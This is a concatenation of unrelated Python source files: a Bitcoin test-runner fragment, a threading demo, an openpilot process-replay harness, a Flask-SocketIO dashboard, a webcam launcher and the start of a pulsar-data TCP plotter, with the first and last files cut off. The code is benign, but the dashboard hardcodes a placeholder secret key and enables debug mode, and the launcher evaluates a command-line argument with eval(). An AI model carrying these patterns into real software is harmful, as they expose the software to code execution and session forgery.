num_jobs, test_list, tests_dir, tmpdir, flags, failfast=False):
update_queue = Queue()
job_queue = Queue()
failfast_event = threading.Event()
test_results = []
poll_timeout = 10 # seconds
# In case there is a graveyard of zombie bitcoinds, we can apply a
# pseudorandom offset to hopefully jump over them.
# (625 is PORT_RANGE/MAX_NODES)
portseed_offset = int(time.time() * 1000) % 625
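    # Each TestCase.run() then uses portseed = test_num + portseed_offset, so the
    # tests launched in this run get distinct --portseed values.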
##
# Define some helper functions we will need for threading.
##
def handle_message(message, running_jobs):
"""
handle_message handles a single message from handle_test_cases
"""
if isinstance(message, TestCase):
running_jobs.append((message.test_num, message.test_case))
print("{}{}{} started".format(BOLD[1], message.test_case, BOLD[0]))
return
if isinstance(message, TestResult):
test_result = message
running_jobs.remove((test_result.num, test_result.name))
test_results.append(test_result)
if test_result.status == "Passed":
print("{}{}{} passed, Duration: {} s".format(
BOLD[1], test_result.name, BOLD[0], TimeResolution.seconds(test_result.time)))
elif test_result.status == "Skipped":
print("{}{}{} skipped".format(
BOLD[1], test_result.name, BOLD[0]))
else:
print("{}{}{} failed, Duration: {} s\n".format(
BOLD[1], test_result.name, BOLD[0], TimeResolution.seconds(test_result.time)))
print(BOLD[1] + 'stdout:' + BOLD[0])
print(test_result.stdout)
print(BOLD[1] + 'stderr:' + BOLD[0])
print(test_result.stderr)
if failfast:
logging.debug("Early exiting after test failure")
failfast_event.set()
return
assert False, "we should not be here"
def handle_update_messages():
"""
handle_update_messages waits for messages to be sent from handle_test_cases via the
update_queue. It serializes the results so we can print nice status update messages.
"""
printed_status = False
running_jobs = []
while True:
message = None
try:
message = update_queue.get(True, poll_timeout)
if message is None:
break
# We printed a status message, need to kick to the next line
# before printing more.
if printed_status:
print()
printed_status = False
handle_message(message, running_jobs)
update_queue.task_done()
except Empty:
if not on_ci():
print("Running jobs: {}".format(
", ".join([j[1] for j in running_jobs])), end="\r")
sys.stdout.flush()
printed_status = True
def handle_test_cases():
"""
        handle_test_cases represents a single thread that is part of a worker pool.
It waits for a test, then executes that test.
It also reports start and result messages to handle_update_messages
"""
while True:
test = job_queue.get()
if test is None:
break
# Signal that the test is starting to inform the poor waiting
# programmer
update_queue.put(test)
result = test.run(portseed_offset)
update_queue.put(result)
job_queue.task_done()
##
# Setup our threads, and start sending tasks
##
# Start our result collection thread.
resultCollector = threading.Thread(target=handle_update_messages)
resultCollector.daemon = True
resultCollector.start()
# Start some worker threads
for j in range(num_jobs):
t = threading.Thread(target=handle_test_cases)
t.daemon = True
t.start()
# Push all our test cases into the job queue.
for i, t in enumerate(test_list):
job_queue.put(TestCase(i, t, tests_dir, tmpdir, failfast_event, flags))
# Wait for all the jobs to be completed
job_queue.join()
# Wait for all the results to be compiled
update_queue.join()
# Flush our queues so the threads exit
update_queue.put(None)
for j in range(num_jobs):
job_queue.put(None)
return test_results
def print_results(test_results, tests_dir, max_len_name,
runtime, combined_logs_len):
results = "\n" + BOLD[1] + "{} | {} | {}\n\n".format(
"TEST".ljust(max_len_name), "STATUS ", "DURATION") + BOLD[0]
test_results.sort(key=TestResult.sort_key)
all_passed = True
time_sum = 0
for test_result in test_results:
all_passed = all_passed and test_result.was_successful
time_sum += test_result.time
test_result.padding = max_len_name
results += str(test_result)
testdir = test_result.testdir
if combined_logs_len and os.path.isdir(testdir):
# Print the final `combinedlogslen` lines of the combined logs
print('{}Combine the logs and print the last {} lines ...{}'.format(
BOLD[1], combined_logs_len, BOLD[0]))
print('\n============')
print('{}Combined log for {}:{}'.format(BOLD[1], testdir, BOLD[0]))
print('============\n')
combined_logs_args = [
sys.executable, os.path.join(
tests_dir, 'combine_logs.py'), testdir]
if BOLD[0]:
combined_logs_args += ['--color']
combined_logs, _ = subprocess.Popen(
combined_logs_args, universal_newlines=True, stdout=subprocess.PIPE).communicate()
print(
"\n".join(
deque(
combined_logs.splitlines(),
combined_logs_len)))
status = TICK + "Passed" if all_passed else CROSS + "Failed"
if not all_passed:
results += RED[1]
results += BOLD[1] + "\n{} | {} | {} s (accumulated) \n".format(
"ALL".ljust(max_len_name), status.ljust(9), TimeResolution.seconds(time_sum)) + BOLD[0]
if not all_passed:
results += RED[0]
results += "Runtime: {} s\n".format(TimeResolution.seconds(runtime))
print(results)
class TestResult():
"""
Simple data structure to store test result values and print them properly
"""
def __init__(self, num, name, testdir, status, time, stdout, stderr):
self.num = num
self.name = name
self.testdir = testdir
self.status = status
self.time = time
self.padding = 0
self.stdout = stdout
self.stderr = stderr
def sort_key(self):
if self.status == "Passed":
return 0, self.name.lower()
elif self.status == "Failed":
return 2, self.name.lower()
elif self.status == "Skipped":
return 1, self.name.lower()
def __repr__(self):
if self.status == "Passed":
color = GREEN
glyph = TICK
elif self.status == "Failed":
color = RED
glyph = CROSS
elif self.status == "Skipped":
color = GREY
glyph = CIRCLE
return color[1] + "{} | {}{} | {} s\n".format(
self.name.ljust(self.padding), glyph, self.status.ljust(7), TimeResolution.seconds(self.time)) + color[0]
@property
def was_successful(self):
return self.status != "Failed"
def get_all_scripts_from_disk(test_dir, non_scripts):
"""
    Return all available test scripts from the script directory (excluding NON_SCRIPTS)
"""
python_files = set([t for t in os.listdir(test_dir) if t[-3:] == ".py"])
return list(python_files - set(non_scripts))
def check_script_prefixes(all_scripts):
"""Check that no more than `EXPECTED_VIOLATION_COUNT` of the
test scripts don't start with one of the allowed name prefixes."""
EXPECTED_VIOLATION_COUNT = 16
# LEEWAY is provided as a transition measure, so that pull-requests
# that introduce new tests that don't conform with the naming
# convention don't immediately cause the tests to fail.
LEEWAY = 0
good_prefixes_re = re.compile(
"(abc_)?(example|feature|interface|mempool|mining|p2p|rpc|wallet|tool)_")
bad_script_names = [
script for script in all_scripts if good_prefixes_re.match(script) is None]
if len(bad_script_names) < EXPECTED_VIOLATION_COUNT:
print(
"{}HURRAY!{} Number of functional tests violating naming convention reduced!".format(
BOLD[1],
BOLD[0]))
print("Consider reducing EXPECTED_VIOLATION_COUNT from {} to {}".format(
EXPECTED_VIOLATION_COUNT, len(bad_script_names)))
elif len(bad_script_names) > EXPECTED_VIOLATION_COUNT:
print(
"INFO: {} tests not meeting naming conventions (expected {}):".format(len(bad_script_names), EXPECTED_VIOLATION_COUNT))
print(" {}".format("\n ".join(sorted(bad_script_names))))
assert len(bad_script_names) <= EXPECTED_VIOLATION_COUNT + \
LEEWAY, "Too many tests not following naming convention! ({} found, expected: <= {})".format(
len(bad_script_names), EXPECTED_VIOLATION_COUNT)
def get_tests_to_run(test_list, test_params, cutoff, src_timings):
"""
    Returns only tests that will not run longer than the cutoff.
    Long-running tests are returned first to favor running tests in parallel.
    Timings from the build directory override those from the src directory.
"""
def get_test_time(test):
# Return 0 if test is unknown to always run it
return next(
(x['time'] for x in src_timings.existing_timings if x['name'] == test), 0)
# Some tests must also be run with additional parameters. Add them to the
# list.
tests_with_params = []
for test_name in test_list:
# always execute a test without parameters
tests_with_params.append(test_name)
params = test_params.get(test_name)
if params is not None:
tests_with_params.extend(
[test_name + " " + " ".join(p) for p in params])
result = [t for t in tests_with_params if get_test_time(t) <= cutoff]
result.sort(key=lambda x: (-get_test_time(x), x))
return result
class RPCCoverage():
"""
Coverage reporting utilities for test_runner.
Coverage calculation works by having each test script subprocess write
coverage files into a particular directory. These files contain the RPC
commands invoked during testing, as well as a complete listing of RPC
commands per `bitcoin-cli help` (`rpc_interface.txt`).
After all tests complete, the commands run are combined and diff'd against
the complete list to calculate uncovered RPC commands.
See also: test/functional/test_framework/coverage.py
"""
def __init__(self):
self.dir = tempfile.mkdtemp(prefix="coverage")
self.flag = '--coveragedir={}'.format(self.dir)
def report_rpc_coverage(self):
"""
Print out RPC commands that were unexercised by tests.
"""
uncovered = self._get_uncovered_rpc_commands()
if uncovered:
print("Uncovered RPC commands:")
print("".join((" - {}\n".format(i)) for i in sorted(uncovered)))
return False
else:
print("All RPC commands covered.")
return True
def cleanup(self):
return shutil.rmtree(self.dir)
def _get_uncovered_rpc_commands(self):
"""
Return a set of currently untested RPC commands.
"""
        # This is shared from `test/functional/test_framework/coverage.py`
reference_filename = 'rpc_interface.txt'
coverage_file_prefix = 'coverage.'
coverage_ref_filename = os.path.join(self.dir, reference_filename)
coverage_filenames = set()
all_cmds = set()
covered_cmds = set()
if not os.path.isfile(coverage_ref_filename):
raise RuntimeError("No coverage reference found")
with open(coverage_ref_filename, 'r', encoding="utf8") as f:
all_cmds.update([i.strip() for i in f.readlines()])
for root, dirs, files in os.walk(self.dir):
for filename in files:
if filename.startswith(coverage_file_prefix):
coverage_filenames.add(os.path.join(root, filename))
for filename in coverage_filenames:
with open(filename, 'r', encoding="utf8") as f:
covered_cmds.update([i.strip() for i in f.readlines()])
return all_cmds - covered_cmds
def save_results_as_junit(test_results, file_name, time, test_suite_name):
"""
Save tests results to file in JUnit format
See http://llg.cubic.org/docs/junit/ for specification of format
"""
e_test_suite = ET.Element("testsuite",
{"name": "{}".format(test_suite_name),
"tests": str(len(test_results)),
# "errors":
"failures": str(len([t for t in test_results if t.status == "Failed"])),
"id": "0",
"skipped": str(len([t for t in test_results if t.status == "Skipped"])),
"time": str(TimeResolution.milliseconds(time)),
"timestamp": datetime.datetime.now().isoformat('T')
})
for test_result in test_results:
e_test_case = ET.SubElement(e_test_suite, "testcase",
{"name": test_result.name,
"classname": test_result.name,
"time": str(TimeResolution.milliseconds(test_result.time))
}
)
if test_result.status == "Skipped":
ET.SubElement(e_test_case, "skipped")
elif test_result.status == "Failed":
ET.SubElement(e_test_case, "failure")
# no special element for passed tests
ET.SubElement(e_test_case, "system-out").text = test_result.stdout
ET.SubElement(e_test_case, "system-err").text = test_result.stderr
ET.ElementTree(e_test_suite).write(
file_name, "UTF-8", xml_declaration=True)
class Timings():
"""
Takes care of loading, merging and saving tests execution times.
"""
def __init__(self, timing_file):
self.timing_file = timing_file
self.existing_timings = self.load_timings()
def load_timings(self):
if os.path.isfile(self.timing_file):
with open(self.timing_file, encoding="utf8") as f:
return json.load(f)
else:
return []
def get_merged_timings(self, new_timings):
"""
        Return a new list containing existing timings updated with the new timings.
        Tests that do not exist in the new timings are not removed.
"""
key = 'name'
merged = {}
for item in self.existing_timings + new_timings:
if item[key] in merged:
merged[item[key]].update(item)
else:
merged[item[key]] = item
# Sort the result to preserve test ordering in file
merged = list(merged.values())
merged.sort(key=lambda t, key=key: t[key])
return merged
def save_timings(self, test_results):
        # We only save tests that have passed - timings for failed tests might be
        # wrong (timeouts or early fails)
passed_results = [t for t in test_results if t.status == 'Passed']
new_timings = list(map(lambda t: {'name': t.name, 'time': TimeResolution.seconds(t.time)},
passed_results))
merged_timings = self.get_merged_timings(new_timings)
with open(self.timing_file, 'w', encoding="utf8") as f:
json.dump(merged_timings, f, indent=True)
class TimeResolution:
@staticmethod
def seconds(time_fractional_second):
return round(time_fractional_second)
@staticmethod
def milliseconds(time_fractional_second):
return round(time_fractional_second, 3)
if __name__ == '__main__':
main()
|
multithreaded_increment.py
|
import threading
N = 1000000
counter = 0
LOCK = threading.Lock()
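# The lock makes each read-modify-write of `counter` atomic; without it the three
# threads could interleave and the final value could fall short of 3 * N.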
def increment_thread():
global counter
for _ in range(N):
with LOCK:
counter += 1
t1 = threading.Thread(target=increment_thread)
t2 = threading.Thread(target=increment_thread)
t3 = threading.Thread(target=increment_thread)
t1.start()
t2.start()
t3.start()
t1.join()
t2.join()
t3.join()
print(f"Counter value is {counter}")
|
process_replay.py
|
#!/usr/bin/env python3
import capnp
import os
import sys
import threading
import importlib
import time
if "CI" in os.environ:
def tqdm(x):
return x
else:
from tqdm import tqdm # type: ignore
from cereal import car, log
from selfdrive.car.car_helpers import get_car
import selfdrive.manager as manager
import cereal.messaging as messaging
from common.params import Params
from cereal.services import service_list
from collections import namedtuple
from selfdrive.manager import managed_processes
# Numpy gives different results based on CPU features after version 1.19
NUMPY_TOLERANCE = 1e-7
ProcessConfig = namedtuple('ProcessConfig', ['proc_name', 'pub_sub', 'ignore', 'init_callback', 'should_recv_callback', 'tolerance'])
def wait_for_event(evt):
if not evt.wait(15):
if threading.currentThread().getName() == "MainThread":
# tested process likely died. don't let test just hang
raise Exception("Timeout reached. Tested process likely crashed.")
else:
# done testing this process, let it die
sys.exit(0)
class FakeSocket:
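    # FakeSocket lock-steps the replayed process: receive() blocks on recv_ready until
    # the test thread has pushed data via send(), while send() first waits for
    # recv_called, so exactly one message is handed over per receive() call.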
def __init__(self, wait=True):
self.data = []
self.wait = wait
self.recv_called = threading.Event()
self.recv_ready = threading.Event()
def receive(self, non_blocking=False):
if non_blocking:
return None
if self.wait:
self.recv_called.set()
wait_for_event(self.recv_ready)
self.recv_ready.clear()
return self.data.pop()
def send(self, data):
if self.wait:
wait_for_event(self.recv_called)
self.recv_called.clear()
self.data.append(data)
if self.wait:
self.recv_ready.set()
def wait_for_recv(self):
wait_for_event(self.recv_called)
class DumbSocket:
def __init__(self, s=None):
if s is not None:
try:
dat = messaging.new_message(s)
except capnp.lib.capnp.KjException: # pylint: disable=c-extension-no-member
# lists
dat = messaging.new_message(s, 0)
self.data = dat.to_bytes()
def receive(self, non_blocking=False):
return self.data
def send(self, dat):
pass
class FakeSubMaster(messaging.SubMaster):
def __init__(self, services):
super(FakeSubMaster, self).__init__(services, addr=None)
self.sock = {s: DumbSocket(s) for s in services}
self.update_called = threading.Event()
self.update_ready = threading.Event()
self.wait_on_getitem = False
def __getitem__(self, s):
# hack to know when fingerprinting is done
if self.wait_on_getitem:
self.update_called.set()
wait_for_event(self.update_ready)
self.update_ready.clear()
return self.data[s]
def update(self, timeout=-1):
self.update_called.set()
wait_for_event(self.update_ready)
self.update_ready.clear()
def update_msgs(self, cur_time, msgs):
wait_for_event(self.update_called)
self.update_called.clear()
super(FakeSubMaster, self).update_msgs(cur_time, msgs)
self.update_ready.set()
def wait_for_update(self):
wait_for_event(self.update_called)
class FakePubMaster(messaging.PubMaster):
def __init__(self, services): # pylint: disable=super-init-not-called
self.data = {}
self.sock = {}
self.last_updated = None
for s in services:
try:
data = messaging.new_message(s)
except capnp.lib.capnp.KjException:
data = messaging.new_message(s, 0)
self.data[s] = data.as_reader()
self.sock[s] = DumbSocket()
self.send_called = threading.Event()
self.get_called = threading.Event()
def send(self, s, dat):
self.last_updated = s
if isinstance(dat, bytes):
self.data[s] = log.Event.from_bytes(dat)
else:
self.data[s] = dat.as_reader()
self.send_called.set()
wait_for_event(self.get_called)
self.get_called.clear()
def wait_for_msg(self):
wait_for_event(self.send_called)
self.send_called.clear()
dat = self.data[self.last_updated]
self.get_called.set()
return dat
def fingerprint(msgs, fsm, can_sock):
print("start fingerprinting")
fsm.wait_on_getitem = True
# populate fake socket with data for fingerprinting
canmsgs = [msg for msg in msgs if msg.which() == "can"]
wait_for_event(can_sock.recv_called)
can_sock.recv_called.clear()
can_sock.data = [msg.as_builder().to_bytes() for msg in canmsgs[:300]]
can_sock.recv_ready.set()
can_sock.wait = False
# we know fingerprinting is done when controlsd sets sm['pathPlan'].sensorValid
wait_for_event(fsm.update_called)
fsm.update_called.clear()
fsm.wait_on_getitem = False
can_sock.wait = True
can_sock.data = []
fsm.update_ready.set()
print("finished fingerprinting")
def get_car_params(msgs, fsm, can_sock):
can = FakeSocket(wait=False)
sendcan = FakeSocket(wait=False)
canmsgs = [msg for msg in msgs if msg.which() == 'can']
for m in canmsgs[:300]:
can.send(m.as_builder().to_bytes())
_, CP = get_car(can, sendcan)
Params().put("CarParams", CP.to_bytes())
def radar_rcv_callback(msg, CP, cfg, fsm):
if msg.which() != "can":
return [], False
elif CP.radarOffCan:
return ["radarState", "liveTracks"], True
radar_msgs = {"honda": [0x445], "toyota": [0x19f, 0x22f], "gm": [0x474],
"chrysler": [0x2d4]}.get(CP.carName, None)
if radar_msgs is None:
raise NotImplementedError
for m in msg.can:
if m.src == 1 and m.address in radar_msgs:
return ["radarState", "liveTracks"], True
return [], False
def calibration_rcv_callback(msg, CP, cfg, fsm):
# calibrationd publishes 1 calibrationData every 5 cameraOdometry packets.
# should_recv always true to increment frame
recv_socks = []
frame = fsm.frame + 1 # incrementing hasn't happened yet in SubMaster
if frame == 0 or (msg.which() == 'cameraOdometry' and (frame % 5) == 0):
recv_socks = ["liveCalibration"]
return recv_socks, fsm.frame == 0 or msg.which() == 'cameraOdometry'
def ublox_rcv_callback(msg):
msg_class, msg_id = msg.ubloxRaw[2:4]
if (msg_class, msg_id) in {(1, 7 * 16)}:
return ["gpsLocationExternal"]
elif (msg_class, msg_id) in {(2, 1 * 16 + 5), (10, 9)}:
return ["ubloxGnss"]
else:
return []
CONFIGS = [
ProcessConfig(
proc_name="controlsd",
pub_sub={
"can": ["controlsState", "carState", "carControl", "sendcan", "carEvents", "carParams"],
"thermal": [], "health": [], "liveCalibration": [], "dMonitoringState": [], "plan": [], "pathPlan": [], "gpsLocation": [], "liveLocationKalman": [],
"model": [], "frontFrame": [],
},
ignore=["logMonoTime", "valid", "controlsState.startMonoTime", "controlsState.cumLagMs"],
init_callback=fingerprint,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
),
ProcessConfig(
proc_name="radard",
pub_sub={
"can": ["radarState", "liveTracks"],
"liveParameters": [], "controlsState": [], "model": [],
},
ignore=["logMonoTime", "valid", "radarState.cumLagMs"],
init_callback=get_car_params,
should_recv_callback=radar_rcv_callback,
tolerance=None,
),
ProcessConfig(
proc_name="plannerd",
pub_sub={
"model": ["pathPlan"], "radarState": ["plan"],
"carState": [], "controlsState": [], "liveParameters": [],
},
ignore=["logMonoTime", "valid", "plan.processingDelay"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=None,
),
ProcessConfig(
proc_name="calibrationd",
pub_sub={
"carState": ["liveCalibration"],
"cameraOdometry": []
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=calibration_rcv_callback,
tolerance=None,
),
ProcessConfig(
proc_name="dmonitoringd",
pub_sub={
"driverState": ["dMonitoringState"],
"liveCalibration": [], "carState": [], "model": [], "controlsState": [],
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
),
ProcessConfig(
proc_name="locationd",
pub_sub={
"cameraOdometry": ["liveLocationKalman"],
"sensorEvents": [], "gpsLocationExternal": [], "liveCalibration": [], "carState": [],
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
),
ProcessConfig(
proc_name="paramsd",
pub_sub={
"liveLocationKalman": ["liveParameters"],
"carState": []
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
),
ProcessConfig(
proc_name="ubloxd",
pub_sub={
"ubloxRaw": ["ubloxGnss", "gpsLocationExternal"],
},
ignore=["logMonoTime"],
init_callback=None,
should_recv_callback=ublox_rcv_callback,
tolerance=None,
),
]
def replay_process(cfg, lr):
proc = managed_processes[cfg.proc_name]
if isinstance(proc, str):
return python_replay_process(cfg, lr)
else:
return cpp_replay_process(cfg, lr)
def python_replay_process(cfg, lr):
sub_sockets = [s for _, sub in cfg.pub_sub.items() for s in sub]
pub_sockets = [s for s in cfg.pub_sub.keys() if s != 'can']
fsm = FakeSubMaster(pub_sockets)
fpm = FakePubMaster(sub_sockets)
args = (fsm, fpm)
if 'can' in list(cfg.pub_sub.keys()):
can_sock = FakeSocket()
args = (fsm, fpm, can_sock)
all_msgs = sorted(lr, key=lambda msg: msg.logMonoTime)
pub_msgs = [msg for msg in all_msgs if msg.which() in list(cfg.pub_sub.keys())]
params = Params()
params.clear_all()
params.manager_start()
params.put("OpenpilotEnabledToggle", "1")
params.put("Passive", "0")
params.put("CommunityFeaturesToggle", "1")
os.environ['NO_RADAR_SLEEP'] = "1"
os.environ['SKIP_FW_QUERY'] = "1"
os.environ['FINGERPRINT'] = ""
for msg in lr:
if msg.which() == 'carParams':
# TODO: get a stock VW route
if "Generic Volkswagen" not in msg.carParams.carFingerprint:
os.environ['FINGERPRINT'] = msg.carParams.carFingerprint
break
manager.prepare_managed_process(cfg.proc_name)
mod = importlib.import_module(manager.managed_processes[cfg.proc_name])
thread = threading.Thread(target=mod.main, args=args)
thread.daemon = True
thread.start()
if cfg.init_callback is not None:
if 'can' not in list(cfg.pub_sub.keys()):
can_sock = None
cfg.init_callback(all_msgs, fsm, can_sock)
CP = car.CarParams.from_bytes(params.get("CarParams", block=True))
# wait for started process to be ready
if 'can' in list(cfg.pub_sub.keys()):
can_sock.wait_for_recv()
else:
fsm.wait_for_update()
log_msgs, msg_queue = [], []
for msg in tqdm(pub_msgs):
if cfg.should_recv_callback is not None:
recv_socks, should_recv = cfg.should_recv_callback(msg, CP, cfg, fsm)
else:
recv_socks = [s for s in cfg.pub_sub[msg.which()] if
(fsm.frame + 1) % int(service_list[msg.which()].frequency / service_list[s].frequency) == 0]
should_recv = bool(len(recv_socks))
if msg.which() == 'can':
can_sock.send(msg.as_builder().to_bytes())
else:
msg_queue.append(msg.as_builder())
if should_recv:
fsm.update_msgs(0, msg_queue)
msg_queue = []
recv_cnt = len(recv_socks)
while recv_cnt > 0:
m = fpm.wait_for_msg()
log_msgs.append(m)
recv_cnt -= m.which() in recv_socks
return log_msgs
def cpp_replay_process(cfg, lr):
sub_sockets = [s for _, sub in cfg.pub_sub.items() for s in sub] # We get responses here
pm = messaging.PubMaster(cfg.pub_sub.keys())
sockets = {s : messaging.sub_sock(s, timeout=1000) for s in sub_sockets}
all_msgs = sorted(lr, key=lambda msg: msg.logMonoTime)
pub_msgs = [msg for msg in all_msgs if msg.which() in list(cfg.pub_sub.keys())]
manager.prepare_managed_process(cfg.proc_name)
manager.start_managed_process(cfg.proc_name)
time.sleep(1) # We give the process time to start
log_msgs = []
for s in sub_sockets:
messaging.recv_one_or_none(sockets[s])
for msg in tqdm(pub_msgs):
pm.send(msg.which(), msg.as_builder())
resp_sockets = sub_sockets if cfg.should_recv_callback is None else cfg.should_recv_callback(msg)
for s in resp_sockets:
response = messaging.recv_one(sockets[s])
if response is not None:
log_msgs.append(response)
manager.kill_managed_process(cfg.proc_name)
return log_msgs
|
server.py
|
## Imports
from flask import Flask, render_template, request
from flask_socketio import SocketIO, send, emit
import socket,time,json,struct,os,sys,datetime,re,logging,threading
from operator import itemgetter
## Setup
app = Flask(__name__)
app.config['SECRET_KEY'] = 'secret!'
socketio = SocketIO(app)
## Routes
@app.route('/')
def loadDefault():
dashboards = getDashboard()
return render_template('main.html', dashboards=dashboards, dashboard=dashboards[0]['name'], hosts=dashboards[0]['hosts'])
@app.route('/dashboard/<dashboard>')
def loadDashboard(dashboard):
dashboards = getDashboard()
dashboard = getDashboard(dashboard)
return render_template('main.html', dashboards=dashboards, dashboard=dashboard['name'], hosts=dashboard['hosts'])
## Functions
def log(message):
    ''' Log messages to the console/log '''
    now = str(datetime.datetime.today()).split('.')[0]
    print(now, message)
def getDashboard(dashboardName=False):
''' Return requested dashboard if specified, otherwise return all dashboards '''
def getData():
''' Return the requested data '''
try:
configFile = 'config.json'
data = json.load(open(configFile,'r'))
return data
except:
log(('ERR','getData','Unable to open',configFile))
return False
data = getData()
if data:
if dashboardName:
for dashboard in data['dashboards']:
if dashboard['name'] == dashboardName: return dashboard
else:
return data['dashboards']
def getHost(dashboardName,hostName):
''' Return requested host '''
dashboard = getDashboard(dashboardName)
if dashboard and hostName:
for host in dashboard['hosts']:
if host['name'] == hostName: return host
else:
return False
# def threadRequest(request):
# response = []
# thread = threading.Thread(target=hostRequest, args=(response,request,))
# thread.start()
# thread.join()
# return response[0]
def hostRequest(request):
''' Make requests against specified hosts '''
log(('DEBUG','GOT REQUEST FROM THREAD:',request))
def socketSnd(sock, msg):
''' Prefix each message with a 4-byte length (network byte order) '''
msg = struct.pack('>I', len(msg)) + msg
sock.sendall(msg)
def socketRcv(sock):
''' Read message length and unpack it into an integer '''
raw_msglen = socketRcvAll(sock, 4)
if not raw_msglen:
return None
msglen = struct.unpack('>I', raw_msglen)[0]
# Read the message data
return socketRcvAll(sock, msglen)
def socketRcvAll(sock, n):
''' Helper function to recv n bytes or return None if EOF is hit '''
data = b''
while len(data) < n:
packet = sock.recv(n - len(data))
if not packet:
return None
data += packet
return data
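    # Minimal framing sketch (illustration only; never called by the server): frame a
    # payload with its 4-byte big-endian length prefix, then parse it back the same way
    # the socketRcv/socketRcvAll helpers above do.
    def framingExample():
        payload = json.dumps({'request': 'hostHealth'}).encode()
        framed = struct.pack('>I', len(payload)) + payload  # length prefix + body
        msglen = struct.unpack('>I', framed[:4])[0]         # reader: unpack the length
        assert framed[4:4 + msglen] == payload              # reader: then read that many bytes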
def makeRequest(request,host):
try:
hostSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if request['request'] == 'hostHealth':
hostSocket.settimeout(0.5) # Time to wait for response
else:
hostSocket.settimeout(20) # Time to wait for response
sndPayload = request
            sndPayload = json.dumps(sndPayload) # Serialise
sndPayload = sndPayload.encode() # Encode
hostSocket.connect( ( host['ip'], int(host['port']) ) )
socketSnd(hostSocket, sndPayload) # Send
rcvPayload = socketRcv(hostSocket) # Receive
            rcvPayload = json.loads(rcvPayload) # De-serialise
rcvPayload['host'] = host['name']
hostSocket.close()
return rcvPayload
except socket.error as e:
request['result'] = 'error'
result = request
return result
host = getHost(request['dashboard'],request['host'])
if host:
return makeRequest(request,host)
# response.append(makeRequest(request,host))
else:
return {'action':'hostRequest','result':'error','message': 'No hosts'}
# response.append({'action':'hostRequest','result':'error','message': 'No hosts'})
## Socket Requests
@socketio.on('serverRequest')
def serverRequest(request):
''' Client requests against this server '''
returnData = hostRequest(request)
# returnData = threadRequest(request)
emit('serverResponse', returnData)
## Flask
if __name__ == '__main__':
socketio.run(app, debug=True)
|
multi_webcam_post.py
|
import multiprocessing as mp
import subprocess
import shlex
import argparse
import os
# function to execute command in shell
def run_command(command):
process = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE)
while True:
output = process.stdout.readline()
if process.poll() is not None:
break
if output:
print(output.strip())
rc = process.poll()
return rc
# functions to handle schedule
def start_webcam_post(f_station,f_webcam,f_webcam_dir):
# command for webcam_process
command_line = 'python3 webcam_post_process.py --station={} --webcam={} --webcam_dir={}'.format(f_station,f_webcam,f_webcam_dir)
# execute in command line
run_command(command_line)
"""----------------------------- options -----------------------------"""
parser = argparse.ArgumentParser(description='Multi Webcam Post Processing')
parser.add_argument('--station', type=int,
help='id for station')
parser.add_argument('--webcams', type=str,
help='list of ids for webcam')
parser.add_argument('--output_dir', type=str, default='../outputs/',
help='location of output drive')
args = parser.parse_args()
if __name__ == "__main__":
# create necessary variables
station_id = args.station
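    # --webcams is eval'd as a Python literal, so it is expected to look like "[0,1,2]"
    # (eval trusts the caller; a safer variant could use ast.literal_eval).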
webcam_ids = eval(args.webcams)
code_dir = os.getcwd() +'/'
os.chdir(args.output_dir)
output_dir = os.getcwd() +'/'
os.chdir(code_dir)
station_dir = output_dir + 'station_{}/'.format(station_id)
webcam_dirs = {}
for webcam_id in webcam_ids:
webcam_dir = station_dir + 'webcam_{}/'.format(webcam_id)
webcam_dirs[webcam_id] = webcam_dir
# multiprocessing
for webcam_id, webcam_dir in webcam_dirs.items():
mp.Process(target=start_webcam_post, args=(station_id,webcam_id,webcam_dir)).start()
|
pyPeekTCP.py
|
import time
import threading
import socket
import sys
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import matplotlib.dates as md
import datetime
import struct
import json
np.seterr(divide="ignore", invalid="ignore")
# target = 'B2111+46'
# target = 'B0329+54'
target = "B1133+16"
# struct IntensityHeader {
# int packet_length; // - packet length
# int header_length; // - header length
# int samples_per_packet; // - number of samples in packet (or dimensions, n_freq x n_time x n_stream?)
# int sample_type; // - data type of samples in packet
# double raw_cadence; // - raw sample cadence
# int num_freqs; // - freq list / map
# int samples_summed; // - samples summed for each datum
# uint handshake_idx; // - frame idx at handshake
# double handshake_utc; // - UTC time at handshake
# char stokes_type; // - description of stream (e.g. V / H pol, Stokes-I / Q / U / V)
# // -8 -7 -6 -5 -4 -3 -2 -1 1 2 3 4
# // YX XY YY XX LR RL LL RR I Q U V
# };
header_fmt = "=iiiidiiiId"
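# Sanity-check sketch: '=iiiidiiiId' packs to 4*4 + 8 + 3*4 + 4 + 8 = 48 bytes,
# matching the 48-byte handshake header read from the socket below.
assert struct.calcsize(header_fmt) == 48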
stokes_lookup = ["YX", "XY", "YY", "XX", "LR", "RL", "LL", "RR", "I", "Q", "U", "V"]
TCP_IP = "0.0.0.0"
TCP_PORT = 2061
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((TCP_IP, TCP_PORT))
sock.listen(1)
psrcat = json.load(open("psrcat_b.json"))["pulsars"]
psrdata = psrcat[target]
def updatefig(*args):
global waterfall, times, medsub, colorscale
tmin = md.date2num(datetime.datetime.fromtimestamp(np.amin(times)))
tmax = md.date2num(datetime.datetime.fromtimestamp(np.amax(times)))
for i in np.arange(pkt_elems):
if medsub:
p[i].set_data(
waterfall[:, :, i]
- np.nanmedian(waterfall[:, :, i], axis=0)[np.newaxis, :]
)
tmpdata = 10 * np.log10(waterfold[:, :, i] / countfold[:, :, i])
p[pkt_elems + i].set_data(
tmpdata - np.median(tmpdata, axis=0)[np.newaxis, :]
)
else:
p[i].set_data(waterfall[:, :, i])
tmpdata = 10 * np.log10(waterfold[:, :, i] / countfold[:, :, i])
p[pkt_elems + i].set_data(tmpdata)
p[i].set_extent([freqlist[0, 0], freqlist[-1, -1], tmin, tmax])
p[i].set_clim(vmin=colorscale[0], vmax=colorscale[1])
p[pkt_elems + i].set_clim(vmin=colorscale[0] / 10, vmax=colorscale[1] / 10)
return (p,)
def receive(connection, length):
chunks = []
